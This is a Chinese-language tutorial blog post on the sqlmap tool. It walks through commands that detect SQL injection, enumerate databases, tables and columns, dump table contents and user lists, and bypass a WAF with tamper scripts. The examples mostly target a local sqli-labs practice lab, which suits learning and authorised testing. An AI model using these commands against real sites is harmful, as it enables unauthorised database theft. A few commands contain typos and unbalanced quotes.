sqlmap详细使用

SQLmap使用详解

SQLmap(常规)使用步骤

1、查询注入点

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1

2、查询所有数据库

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs

3、查询当前数据库

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db

4、查表

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx --tables

5、查列

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx -T xxx --columns

6、查数据

复制代码
  python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D xxx -T xxx --dump

目标

指定URL

复制代码
  sqlmap -u "http://www.xxxx.com/vuln.php?id=1" --batch特指一个url
--batch  自动选yes

指定文件

复制代码
  sqlmap -m url.txt  #批量url注入扫描

POST请求

复制代码
  sqlmap -r ab.txt --data=DATA
--data=DATA 指定参数注入 例如:例:-u "xxx?id=1" --data="name=1&pass=2"

level

指需要执行的测试等级,一共有5个等级(1~5)

  • level 1:默认的 level 等级,会测试 GET 和 POST 请求中的参数。
  • level 2:加上level1,还会检查 cookie 里的数据。
  • level 3:加上level2,还user-agent 和 referer 头部也纳入检测范围。
  • level 4~5:加上前几个,会尝试各种 payloads,放过任何潜在的注入点。

脱库

获取数据库

复制代码
   --dbs 获取数据库
Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs
 --current-db 获取当前数据库
Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db

获取表

复制代码
   Sqlmap-u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security' --tables
 Sqlmap  -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security,mysql' --tables 获取多个数据库的表

获取字段

--columns 获取字段

复制代码
 Sqlmap -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'security' -T 'user' --columns 

获取数据

--dump 表中的数据,可以指定具体的库,表,字段,只指定库名可获取库中所有表的数据

复制代码
 sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -D 'securit'-T 'user' --dump

获取用户

--current-user 获取当前登录数据库的用户名

复制代码
  Sqlmap -u 'http://127.0.0.1/sqli-labs/Less-1/?id=1 --batch   --current-user

--user 获取数据库的所有用户名

复制代码
  sqlmap  -u http://sqli:8001/Less-2/?id=1 --batch --users

WAF绕过

Sqlmap -u http://sqli:8001/Less-2/?id=1 --tamper 'xxx.py'#添对应的加密脚本

相关推荐
浩浩测试一下28 分钟前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
帅云毅3 小时前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
迷路的小绅士4 小时前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
网络·web安全·ddos
极小狐4 小时前
极狐GitLab 项目功能和权限解读
运维·git·安全·gitlab·极狐gitlab
国科安芯6 小时前
面向高性能运动控制的MCU:架构创新、算法优化与应用分析
单片机·嵌入式硬件·安全·架构·机器人·汽车·risc-v
ALe要立志成为web糕手6 小时前
[BJDCTF2020]EzPHP
web安全·网络安全·php·ctf
迷路的小绅士7 小时前
常见网络安全攻击类型深度剖析(四):跨站脚本攻击(XSS)——分类、漏洞利用与前端安全防护
前端·安全·web安全
自由鬼8 小时前
开源漏洞扫描器:OpenVAS
运维·服务器·安全·网络安全·开源·漏洞管理
Python_金钱豹8 小时前
Text2SQL零代码实战!RAGFlow 实现自然语言转 SQL 的终极指南
前端·数据库·sql·安全·ui·langchain·机器人
TazmiDev8 小时前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注